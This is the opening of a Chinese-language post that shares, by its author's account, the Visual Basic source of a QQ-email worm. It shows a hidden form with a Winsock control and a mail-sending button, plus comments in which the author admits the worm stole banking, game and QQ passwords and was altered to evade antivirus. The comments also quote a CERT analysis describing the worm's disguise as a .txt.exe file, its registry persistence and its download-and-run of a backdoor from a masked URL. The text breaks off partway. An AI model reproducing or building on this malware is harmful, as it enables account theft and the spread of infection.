form1.frm

警惕最新QQ.Email 蠕虫(源代码) 大家在Google 输入inetdbs.exe就可以找到该病毒的介绍了

VERSION 5.00
Object = "{248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0"; "MSWINSCK.OCX"
Begin VB.Form Form1 
   BorderStyle     =   0  'None
   Caption         =   "Default IME"
   ClientHeight    =   2925
   ClientLeft      =   -11340
   ClientTop       =   2070
   ClientWidth     =   4215
   Icon            =   "Form1.frx":0000
   LinkTopic       =   "Form1"
   ScaleHeight     =   2925
   ScaleWidth      =   4215
   ShowInTaskbar   =   0   'False
   Begin VB.Timer Timer1 
      Enabled         =   0   'False
      Interval        =   1000
      Left            =   1920
      Top             =   1080
   End
   Begin VB.Timer Timer2 
      Interval        =   1000
      Left            =   1200
      Top             =   960
   End
   Begin MSWinsockLib.Winsock Winsock1 
      Left            =   0
      Top             =   1320
      _ExtentX        =   741
      _ExtentY        =   741
      _Version        =   393216
   End
   Begin VB.CommandButton Command1 
      Caption         =   "发邮件"
      Height          =   375
      Left            =   60
      TabIndex        =   0
      Top             =   60
      Width           =   1035
   End
End
Attribute VB_Name = "Form1"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
'---------------------------------------------------------
'本代码仅供学习之用,由本代码引起的一切问题,本人概不负责.
'---------------------------------------------------------
'*******************************************************************************
'这是一个蠕虫，利用腾讯的QQ邮箱来传播的。现已失效，也许是因为这个蠕虫吧。
'现在发布出来跟大家共享一下，本人只会VB，编程序惯有点乱（管他呢，只要
'自己看得懂，电脑看得懂就行了）
'
'这是在Windows XP SP2,VB5.0下编译,可以在Win9X/2000/XP下运行，这也是因为VB5
'都会自带运行库，注释是后面写的，看不懂不要问我。
'
'声明：自从这个蠕虫放出去后，这又是一个盗网上银行密码的，绝大部分游戏密码等等
'      实际上，我只用来盗QQ（当然现在QQ是一把啊），其它的密码基本没时间看。
'
'我没有过人之处,用的都是别人的代码.只不过在上面加点,删点就出来了
'
'密码解霸的功能强大,本人用的是密码解霸2.03(本人就喜欢用这个),被本人修改过,可以
'躲过查杀
'
'作者:wpzkq
'QQ:10000      哪敢留QQ啊,给腾讯知道,不封才怪
'Email:wpzkq@eyou.com
'如有转载,请保留完整
'===================================================================================
'***********************************************************************************
'以下是网上找来的,加<<是本人添加
'***********************************************************************************
'===================================================================================
'警惕最新QQ.Email蠕虫
'
'安天CERT小组
'一?概述
'病毒名称: Email -Worm.Win32.VB.ac'
'文件大小：13.279k
'编写语言：Microsoft Visual Basic           <<VB5.0
'壳类型：UPX-Scrambler RC1.x -> ㎡nT畂L
'
'近两日，众多QQ用户经常接到别人发来的QQ邮件，请小心不要打开查看，以免中木马。
'该蠕虫使用文本图标和.txt.exe扩展名伪装自身，诱导用户执行蠕虫体。
'
'
'二、分析：（vvv是被屏蔽掉的连接）
'
'
'1、 蠕虫运行后，会弹出一个文件格式无效的对话框，迷惑用户，并将自身拷贝到系统目录%system%为：
'C:\WINDOWS\system32\Inetdbs.exe 文件属性为：RHS
'同时将自身加入到系统注册表启动项目:
'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
'键名：Inet DataBase 键值："C:\WINDOWS\System32\Inetdbs.exe"
'
'
'
'2、然后蠕虫会到：http://www.vvv.com/image/new.jpg下载一个139.264字节的new.jpg文件，此文件为PE格式，使用PEncrypt 3.1 Final加壳，实际为Backdoor.PowerSpider.a，即国内流传的密码解霸。
'
''
'
'3、将下载的new.jpg改名为~DF41F8.EXE并执行。执行后释放将自身拷贝到系统目录：
'拷贝文件为:
'C:\WINDOWS\system32\mstext32.dll 7KB
'C:\WINDOWS\system32\